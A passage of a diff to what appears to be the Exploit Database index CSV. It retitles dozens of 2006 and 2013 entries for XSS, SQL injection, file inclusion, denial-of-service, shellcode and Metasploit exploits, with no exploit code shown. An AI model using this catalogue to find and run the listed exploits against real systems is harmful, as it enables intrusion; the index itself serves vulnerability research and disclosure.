Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps,0 +27088,platforms/cgi/webapps/27088.txt,"Faq-O-Matic 2.711 - Multiple Cross-Site Scripting Vulnerabilities",2006-01-16,Preddy,cgi,webapps,0 27089,platforms/windows/dos/27089.c,"CounterPath eyeBeam 1.1 build 3010n SIP Header Data Remote Buffer Overflow Vulnerability (1)",2006-01-11,ZwelL,windows,dos,0 27090,platforms/windows/dos/27090.c,"CounterPath eyeBeam 1.1 build 3010n SIP Header Data Remote Buffer Overflow Vulnerability (2)",2006-01-15,ZwelL,windows,dos,0 27091,platforms/cgi/webapps/27091.txt,"Ultimate Auction 3.67 ItemList.PL Cross-Site Scripting Vulnerability",2006-01-16,querkopf,cgi,webapps,0 @@ -24196,18 +24196,18 @@ id,file,description,date,author,platform,type,port 27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.PHP SQL Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products BBCode Link Tag Script Injection Vulnerability",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27140,platforms/multiple/dos/27140.txt,"Exiv2 - Corrupted EXIF Data Denial of Service Vulnerability",2006-01-26,"Maciek Wierciski",multiple,dos,0 -27141,platforms/cgi/webapps/27141.txt,"Elido Face Control 0 Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 +27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 Login.ASP SQL Injection Vulnerability",2006-01-19,code.shell,asp,webapps,0 27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 Forum.ASP Multiple SQL Injection Vulnerabilities",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27144,platforms/linux/dos/27144.py,"Communigate Pro 5.0.6 Server LDAP Denial of Service Vulnerability",2006-01-28,"Evgeny Legerov",linux,dos,0 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x Inline XML File Attachment Buffer Overflow Vulnerability",2006-01-28,"Mike Davis",linux,dos,0 -27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke 0 Modules.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 +27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - Modules.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27148,platforms/php/webapps/27148.txt,"Nuked-klaN 1.7 Index.PHP Cross-Site Scripting Vulnerability",2006-01-30,night_warrior771,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 Cross-Site Scripting Vulnerability",2006-01-30,0o_zeus_o0,php,webapps,0 27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability",2006-01-30,"Chris Thomas",linux,remote,0 27151,platforms/asp/webapps/27151.txt,"Daffodil CRM 1.5 Userlogin.ASP SQL Injection Vulnerability",2006-01-30,preben@watchcom.no,asp,webapps,0 -27152,platforms/php/webapps/27152.txt,"BrowserCRM 0 Results.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 +27152,platforms/php/webapps/27152.txt,"BrowserCRM - Results.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 27153,platforms/php/webapps/27153.txt,"Cerberus Helpdesk 2.7 Clients.PHP Cross-Site Scripting Vulnerability",2006-01-31,preben@watchcom.no,php,webapps,0 27154,platforms/php/webapps/27154.txt,"FarsiNews 2.1 Loginout.PHP Remote File Include Vulnerability",2006-01-31,"Hamid Ebadi",php,webapps,0 27155,platforms/php/webapps/27155.txt,"MyBB 1.0/1.1 Index.PHP Referrer Cookie SQL Injection Vulnerability",2006-01-31,Devil-00,php,webapps,0 @@ -24215,7 +24215,7 @@ id,file,description,date,author,platform,type,port 27157,platforms/php/webapps/27157.txt,"SPIP 1.8/1.9 - Multiple SQL Injection Vulnerabilities",2006-02-01,Siegfried,php,webapps,0 27158,platforms/php/webapps/27158.txt,"SPIP 1.8/1.9 Index.PHP3 Cross-Site Scripting Vulnerability",2006-02-01,Siegfried,php,webapps,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 Convert-FCronTab Local Buffer Overflow Vulnerability",2006-02-01,"Adam Zabrocki",multiple,dos,0 -27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop 0 Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 +27160,platforms/asp/webapps/27160.txt,"SoftMaker Shop - Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,preben@watchcom.no,asp,webapps,0 27161,platforms/asp/webapps/27161.txt,"CyberShop Ultimate E-commerce Multiple Cross-Site Scripting Vulnerabilities",2006-02-02,B3g0k,asp,webapps,0 27162,platforms/php/webapps/27162.txt,"cPanel 10.8.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-03,"Simo Ben Youssef",php,webapps,0 27163,platforms/cgi/webapps/27163.txt,"IBM Tivoli Access Manager Plugin Directory Traversal Vulnerability",2006-02-04,"Timothy D. Morgan",cgi,webapps,0 @@ -24229,9 +24229,9 @@ id,file,description,date,author,platform,type,port 27171,platforms/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service Vulnerability",2006-02-08,"Evgeny Legerov",multiple,dos,0 27172,platforms/php/webapps/27172.txt,"SPIP 1.8.2 Spip_RSS.PHP Remote Command Execution Vulnerability",2006-02-08,rgod,php,webapps,0 27173,platforms/php/webapps/27173.txt,"CPAINT 1.3/2.0 TYPE.PHP Cross-Site Scripting Vulnerability",2006-02-08,"James Bercegay",php,webapps,0 -27174,platforms/asp/webapps/27174.txt,"GA's Forum Light 0 Archive.ASP SQL Injection Vulnerability",2006-02-07,Dj_Eyes,asp,webapps,0 +27174,platforms/asp/webapps/27174.txt,"GA's Forum Light - Archive.ASP SQL Injection Vulnerability",2006-02-07,Dj_Eyes,asp,webapps,0 27175,platforms/php/webapps/27175.php,"PwsPHP 1.2.3 Index.PHP SQL Injection Vulnerability",2006-02-09,papipsycho,php,webapps,0 -27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 +27176,platforms/php/webapps/27176.txt,"Papoo 2.1.x - Multiple Cross-Site Scripting Vulnerabilities",2006-02-09,"Dj Eyes",php,webapps,0 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM Bind Shell (Port 4444)",2013-07-28,"Matthew Graeber",arm,shellcode,0 27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 iNotes javascript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0 @@ -24268,8 +24268,8 @@ id,file,description,date,author,platform,type,port 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 LDAP Memory Corruption Vulnerability",2006-02-14,"Evgeny Legerov",multiple,dos,0 27213,platforms/php/webapps/27213.txt,"QwikiWiki 1.5 Search.PHP Cross-Site Scripting Vulnerability",2006-02-14,Citynova,php,webapps,0 27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 Member_Login.PHP SQL Injection Vulnerability",2006-02-14,"Audun Larsen",php,webapps,0 -27215,platforms/php/webapps/27215.txt,"sNews 0 Comment Body XSS",2006-02-14,joffer,php,webapps,0 -27216,platforms/php/webapps/27216.txt,"sNews 0 index.php Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 +27215,platforms/php/webapps/27215.txt,"sNews - Comment Body XSS",2006-02-14,joffer,php,webapps,0 +27216,platforms/php/webapps/27216.txt,"sNews - index.php Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 27217,platforms/php/webapps/27217.txt,"Dotproject 2.0 /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27218,platforms/php/webapps/27218.txt,"Dotproject 2.0 /includes/db_connect.php baseDir Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27219,platforms/php/webapps/27219.txt,"Dotproject 2.0 /includes/session.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 @@ -24301,7 +24301,7 @@ id,file,description,date,author,platform,type,port 27245,platforms/php/webapps/27245.txt,"V-webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,php,webapps,0 27246,platforms/linux/dos/27246.txt,"Mozilla Thunderbird 1.5 Address Book Import Remote Denial of Service Vulnerability",2006-02-17,DrFrancky,linux,dos,0 27247,platforms/php/webapps/27247.txt,"E107 Website System 0.7.2 Chatbox Plugin HTML Injection Vulnerability",2006-02-18,"marc & shb",php,webapps,0 -27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy 0 SQL Injection Vulnerability",2006-02-18,murfie,php,webapps,0 +27248,platforms/php/webapps/27248.txt,"Webpagecity WPC easy - SQL Injection Vulnerability",2006-02-18,murfie,php,webapps,0 27249,platforms/php/webapps/27249.html,"PHPNuke 7.x CAPTCHA Bypass Weakness",2006-02-18,waraxe,php,webapps,0 27250,platforms/php/webapps/27250.txt,"TTS Software Time Tracking Software 3.0 Edituser.PHP Access Validation Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 27251,platforms/php/webapps/27251.txt,"Magic Calendar Lite 1.02 Index.PHP SQL Injection Vulnerability",2006-02-20,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24311,7 +24311,7 @@ id,file,description,date,author,platform,type,port 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27256,platforms/php/webapps/27256.txt,"RunCMS 1.x Ratefile.PHP Cross-Site Scripting Vulnerability",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 27257,platforms/linux/dos/27257.html,"Multiple Mozilla Products IFRAME JavaScript Execution Vulnerabilit",2006-02-22,"Georgi Guninski",linux,dos,0 -27258,platforms/asp/webapps/27258.txt,"Ipswitch WhatsUp Professional 2006 Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,webapps,0 +27258,platforms/asp/webapps/27258.txt,"Ipswitch WhatsUp Professional 2006 - Remote Denial of Service Vulnerability",2006-02-22,"Josh Zlatin-Amishav",asp,webapps,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 Search Page SQL Injection Vulnerability",2006-02-22,trueend5,php,webapps,0 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Include Vulnerability",2006-02-22,trueend5,php,webapps,0 @@ -24394,7 +24394,7 @@ id,file,description,date,author,platform,type,port 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 Poems.PHP SQL Injection Vulnerability",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 forgotten_password.PHP SQL Injection Vulnerability",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 Profile.PHP Email Field HTML Injection Vulnerability",2006-03-02,imei,php,webapps,0 -27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System 0 index.php Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 +27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - index.php Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Include Vulnerability",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 Show.PHP MainID SQL Injection Vulnerability",2006-03-04,Mr.SNAKE,php,webapps,0 27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 comment.php UserID Parameter XSS",2006-03-04,Mr.SNAKE,php,webapps,0 @@ -24455,7 +24455,7 @@ id,file,description,date,author,platform,type,port 27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent XSS Vulnerability",2013-08-07,RogueCoder,php,webapps,0 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection Vulnerability",2013-08-07,"Matias Fontanini",php,webapps,0 27406,platforms/windows/webapps/27406.txt,"McAfee Superscan 4.0 - XSS Vulnerability",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0 -27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x Remote Denial of Service Vulnerability",2006-03-09,"Brandon Milner",windows,dos,0 +27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service Vulnerability",2006-03-09,"Brandon Milner",windows,dos,0 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection Vulnerability",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 index.php Multiple Parameter XSS",2006-03-10,Kiki,php,webapps,0 27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 login.php Multiple Parameter XSS",2006-03-10,Kiki,php,webapps,0 @@ -24463,13 +24463,13 @@ id,file,description,date,author,platform,type,port 27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 recentchanges.php help Parameter XSS",2006-03-10,Kiki,php,webapps,0 27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 Index.PHP Remote Code Execution Vulnerability",2006-03-10,botan,php,webapps,0 27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 Create.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 -27415,platforms/php/webapps/27415.txt,"WMNews 0 wmview.php ArtCat Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 -27416,platforms/php/webapps/27416.txt,"WMNews 0 footer.php ctrrowcol Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 -27417,platforms/php/webapps/27417.txt,"WMNews 0 wmcomments.php ArtID Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 +27415,platforms/php/webapps/27415.txt,"WMNews - wmview.php ArtCat Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 +27416,platforms/php/webapps/27416.txt,"WMNews - footer.php ctrrowcol Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 +27417,platforms/php/webapps/27417.txt,"WMNews - wmcomments.php ArtID Parameter XSS",2006-03-10,R00T3RR0R,php,webapps,0 27418,platforms/windows/dos/27418.txt,"Firebird 1.5 - Local Inet_Server Buffer Overflow Vulnerability",2006-03-13,"Joxean Koret",windows,dos,0 27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 Forumlib.PHP SQL Injection Vulnerability",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 27420,platforms/multiple/dos/27420.c,"ENet Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",multiple,dos,0 -27421,platforms/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",multiple,dos,0 +27421,platforms/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",multiple,dos,0 27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24526,11 +24526,11 @@ id,file,description,date,author,platform,type,port 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 Toast.ASP Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 -27480,platforms/asp/webapps/27480.txt,"Online Quiz System 0 prequiz.asp exam Parameter XSS",2006-03-27,r0t,asp,webapps,0 -27481,platforms/asp/webapps/27481.txt,"Online Quiz System 0 student.asp msg Parameter XSS",2006-03-27,r0t,asp,webapps,0 +27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter XSS",2006-03-27,r0t,asp,webapps,0 +27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter XSS",2006-03-27,r0t,asp,webapps,0 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 Cross-Site Scripting Vulnerability",2006-03-27,r0t,asp,webapps,0 -27483,platforms/php/webapps/27483.txt,"Pixel Motion 0 admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27484,platforms/php/webapps/27484.txt,"Pixel Motion 0 index.php date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27484,platforms/php/webapps/27484.txt,"Pixel Motion - index.php date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 Index.PHP Multiple SQL Injection Vulnerabilities",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS",2006-03-27,r0t,asp,webapps,0 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 @@ -24543,9 +24543,9 @@ id,file,description,date,author,platform,type,port 27494,platforms/php/webapps/27494.txt,"PHPmyfamily 1.4.1 Track.PHP Cross-Site Scripting Vulnerability",2006-03-28,matrix_killer,php,webapps,0 27495,platforms/php/webapps/27495.txt,"phpCOIN 1.2 mod_print.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 27496,platforms/php/webapps/27496.txt,"phpCOIN 1.2 mod.php fs Parameter XSS",2006-03-28,r0t,php,webapps,0 -27497,platforms/php/webapps/27497.txt,"CONTROLzx HMS 3.3.4 shared_order.php sharedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 -27498,platforms/php/webapps/27498.txt,"CONTROLzx HMS 3.3.4 dedicated_order.php dedicatedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 -27499,platforms/php/webapps/27499.txt,"CONTROLzx HMS 3.3.4 server_management.php plan_id Parameter XSS",2006-03-28,r0t,php,webapps,0 +27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 shared_order.php sharedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 +27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 dedicated_order.php dedicatedPlanID Parameter XSS",2006-03-28,r0t,php,webapps,0 +27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 server_management.php plan_id Parameter XSS",2006-03-28,r0t,php,webapps,0 27500,platforms/php/webapps/27500.txt,"Arab Portal System 2.0 online.php title Parameter XSS",2006-03-28,o.y.6,php,webapps,0 27501,platforms/php/webapps/27501.txt,"Arab Portal System 2.0 download.php title Parameter XSS",2006-03-28,o.y.6,php,webapps,0 27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 ViewDay.html Multiple Parameter XSS",2006-03-28,r0t,php,webapps,0 @@ -24573,9 +24573,9 @@ id,file,description,date,author,platform,type,port 27528,platforms/hardware/remote/27528.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-12,metasploit,hardware,remote,0 27529,platforms/php/remote/27529.rb,"OpenX Backdoor PHP Code Execution",2013-08-12,metasploit,php,remote,0 27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,metasploit,multiple,remote,0 -27531,platforms/php/webapps/27531.txt,"Wordpress HMS Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 +27531,platforms/php/webapps/27531.txt,"Wordpress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 -27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 +27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.PHP Remote File Include Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 Post.PHP SQL Injection Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 Searchresults.ASP Cross-Site Scripting Vulnerability",2006-03-31,r0t,asp,webapps,0 @@ -24584,17 +24584,17 @@ id,file,description,date,author,platform,type,port 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 login.php Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 register.php Multiple Field XSS",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27541,platforms/php/webapps/27541.txt,"DbbS 2.0 Topics.PHP SQL Injection Vulnerability",2006-03-31,DaBDouB-MoSiKaR,php,webapps,0 -27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery 0 mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery 0 template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery 0 suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery 0 insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery 0 images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27542,platforms/php/webapps/27542.txt,"SoftBiz Image Gallery - mage_desc.php Multiple Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27543,platforms/php/webapps/27543.txt,"SoftBiz Image Gallery - template.php provided Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27547,platforms/multiple/dos/27547.txt,"zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 27548,platforms/php/webapps/27548.txt,"Claroline 1.x Rqmkhtml.PHP Information Disclosure Vulnerability",2006-03-31,rgod,php,webapps,0 27549,platforms/php/webapps/27549.txt,"Claroline 1.x RQMKHTML.PHP Cross-Site Scripting Vulnerability",2006-03-31,rgod,php,webapps,0 -27550,platforms/php/webapps/27550.txt,"blank'n'berg 0.2 - Directory Traversal vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 +27550,platforms/php/webapps/27550.txt,"blank'n'berg 0.2 - Directory Traversal Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 Cross-Site Scripting Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 -27552,platforms/asp/webapps/27552.txt,"ISP Site Man 0 Admin_Login.ASP SQL Injection Vulnerability",2006-04-01,s3rv3r_hack3r,asp,webapps,0 +27552,platforms/asp/webapps/27552.txt,"ISP Site Man - Admin_Login.ASP SQL Injection Vulnerability",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27553,platforms/windows/dos/27553.py,"onehttpd 0.7 - Denial of Service",2013-08-13,superkojiman,windows,dos,8080 27554,platforms/windows/remote/27554.py,"MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 27555,platforms/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance Login Buffer Overflow",2013-08-13,metasploit,windows,remote,13838 @@ -24655,7 +24655,7 @@ id,file,description,date,author,platform,type,port 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 login.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 index.php Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 memo.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 -27615,platforms/php/webapps/27615.txt,"AzDGVote 0 Remote File Include Vulnerability",2006-04-11,SnIpEr_SA,php,webapps,0 +27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Include Vulnerability",2006-04-11,SnIpEr_SA,php,webapps,0 27616,platforms/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 thumbnail.php page Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 27617,platforms/php/shellcode/27617.txt,"JetPhoto 1.0/2.0/2.1 gallery.php page Parameter XSS",2006-04-11,0o_zeus_o0,php,shellcode,0 27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 slideshow.php name Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 @@ -24671,7 +24671,7 @@ id,file,description,date,author,platform,type,port 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 Index.PHP SQL Injection Vulnerability",2006-04-11,LoK-Crew,php,webapps,0 27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 Index.PHP SQL Injection Vulnerability",2006-04-12,Dr.Jr7,php,webapps,0 27630,platforms/linux/remote/27630.txt,"Plone 2.x MembershipTool Access Control Bypass Vulnerability",2006-04-12,MJ0011,linux,remote,0 -27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 +27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 27632,platforms/php/webapps/27632.txt,"PHPMyAdmin 2.7 SQL.PHP Cross-Site Scripting Vulnerability",2005-10-31,p0w3r,php,webapps,0 27633,platforms/php/webapps/27633.txt,"MyBB 1.10 Member.PHP Cross-Site Scripting Vulnerability",2006-04-12,o.y.6,php,webapps,0 27634,platforms/php/webapps/27634.txt,"PatroNet CMS Index.PHP Cross-Site Scripting Vulnerability",2006-04-12,Soothackers,php,webapps,0 @@ -24729,8 +24729,8 @@ id,file,description,date,author,platform,type,port 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 index.cgi Multiple Parameter XSS",2006-04-19,r0t,cgi,webapps,0 -27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 0 Multiple SQL Injection Vulnerabilities",2006-04-19,r0t,php,webapps,0 -27693,platforms/php/webapps/27693.txt,"otalCalendar 0 about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 +27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injection Vulnerabilities",2006-04-19,r0t,php,webapps,0 +27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 